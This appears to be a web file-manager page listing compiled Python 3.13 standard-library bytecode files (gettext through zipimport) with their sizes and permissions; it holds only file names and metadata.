gettext.cpython-313.pyc File 22.35 KB 0644
glob.cpython-313.pyc File 23.11 KB 0644
graphlib.cpython-313.pyc File 9.96 KB 0644
gzip.cpython-313.pyc File 31.23 KB 0644
hashlib.cpython-313.pyc File 7.99 KB 0644
heapq.cpython-313.pyc File 17.35 KB 0644
hmac.cpython-313.pyc File 10.41 KB 0644
imaplib.cpython-313.pyc File 61.18 KB 0644
inspect.cpython-313.pyc File 132.7 KB 0644
io.cpython-313.pyc File 4.17 KB 0644
ipaddress.cpython-313.pyc File 89.47 KB 0644
keyword.cpython-313.pyc File 1.02 KB 0644
linecache.cpython-313.pyc File 8.35 KB 0644
locale.cpython-313.pyc File 57.63 KB 0644
lzma.cpython-313.pyc File 15.35 KB 0644
mailbox.cpython-313.pyc File 115.95 KB 0644
mimetypes.cpython-313.pyc File 24.31 KB 0644
modulefinder.cpython-313.pyc File 27.73 KB 0644
netrc.cpython-313.pyc File 8.93 KB 0644
ntpath.cpython-313.pyc File 26.56 KB 0644
nturl2path.cpython-313.pyc File 2.67 KB 0644
numbers.cpython-313.pyc File 13.45 KB 0644
opcode.cpython-313.pyc File 3.97 KB 0644
operator.cpython-313.pyc File 16.96 KB 0644
optparse.cpython-313.pyc File 66 KB 0644
os.cpython-313.pyc File 44.75 KB 0644
pdb.cpython-313.pyc File 103.62 KB 0644
pickle.cpython-313.pyc File 76.57 KB 0644
pickletools.cpython-313.pyc File 78.54 KB 0644
pkgutil.cpython-313.pyc File 19.49 KB 0644
platform.cpython-313.pyc File 43.63 KB 0644
plistlib.cpython-313.pyc File 42.09 KB 0644
poplib.cpython-313.pyc File 17.99 KB 0644
posixpath.cpython-313.pyc File 17.7 KB 0644
pprint.cpython-313.pyc File 29 KB 0644
profile.cpython-313.pyc File 22.03 KB 0644
pstats.cpython-313.pyc File 36.97 KB 0644
pty.cpython-313.pyc File 7.23 KB 0644
py_compile.cpython-313.pyc File 9.83 KB 0644
pyclbr.cpython-313.pyc File 14.79 KB 0644
pydoc.cpython-313.pyc File 136.68 KB 0644
queue.cpython-313.pyc File 16.94 KB 0644
quopri.cpython-313.pyc File 9.34 KB 0644
random.cpython-313.pyc File 34.43 KB 0644
reprlib.cpython-313.pyc File 10.18 KB 0644
rlcompleter.cpython-313.pyc File 8.37 KB 0644
runpy.cpython-313.pyc File 14.05 KB 0644
sched.cpython-313.pyc File 7.42 KB 0644
secrets.cpython-313.pyc File 2.45 KB 0644
selectors.cpython-313.pyc File 25.74 KB 0644
shelve.cpython-313.pyc File 12.98 KB 0644
shlex.cpython-313.pyc File 14.5 KB 0644
shutil.cpython-313.pyc File 65.87 KB 0644
signal.cpython-313.pyc File 4.44 KB 0644
site.cpython-313.pyc File 31.86 KB 0644
sitecustomize.cpython-313.pyc File 299 B 0644
smtplib.cpython-313.pyc File 46.25 KB 0644
socket.cpython-313.pyc File 41.23 KB 0644
socketserver.cpython-313.pyc File 33.84 KB 0644
sre_compile.cpython-313.pyc File 627 B 0644
sre_constants.cpython-313.pyc File 630 B 0644
sre_parse.cpython-313.pyc File 623 B 0644
ssl.cpython-313.pyc File 63.68 KB 0644
stat.cpython-313.pyc File 5.39 KB 0644
statistics.cpython-313.pyc File 69.43 KB 0644
string.cpython-313.pyc File 11.38 KB 0644
stringprep.cpython-313.pyc File 24.67 KB 0644
struct.cpython-313.pyc File 325 B 0644
subprocess.cpython-313.pyc File 79.8 KB 0644
symtable.cpython-313.pyc File 22.65 KB 0644
tabnanny.cpython-313.pyc File 12.13 KB 0644
tarfile.cpython-313.pyc File 122.79 KB 0644
tempfile.cpython-313.pyc File 48.68 KB 0644
textwrap.cpython-313.pyc File 17.51 KB 0644
this.cpython-313.pyc File 1.38 KB 0644
threading.cpython-313.pyc File 61.72 KB 0644
timeit.cpython-313.pyc File 14.29 KB 0644
token.cpython-313.pyc File 3.49 KB 0644
tokenize.cpython-313.pyc File 24.84 KB 0644
trace.cpython-313.pyc File 33.17 KB 0644
traceback.cpython-313.pyc File 69.38 KB 0644
tracemalloc.cpython-313.pyc File 26.77 KB 0644
tty.cpython-313.pyc File 2.6 KB 0644
turtle.cpython-313.pyc File 171.21 KB 0644
types.cpython-313.pyc File 15.18 KB 0644
typing.cpython-313.pyc File 150.96 KB 0644
uuid.cpython-313.pyc File 31.4 KB 0644
warnings.cpython-313.pyc File 28.85 KB 0644
wave.cpython-313.pyc File 32.44 KB 0644
weakref.cpython-313.pyc File 31.06 KB 0644
webbrowser.cpython-313.pyc File 26.26 KB 0644
zipapp.cpython-313.pyc File 10.15 KB 0644
zipimport.cpython-313.pyc File 25.89 KB 0644
Filemanager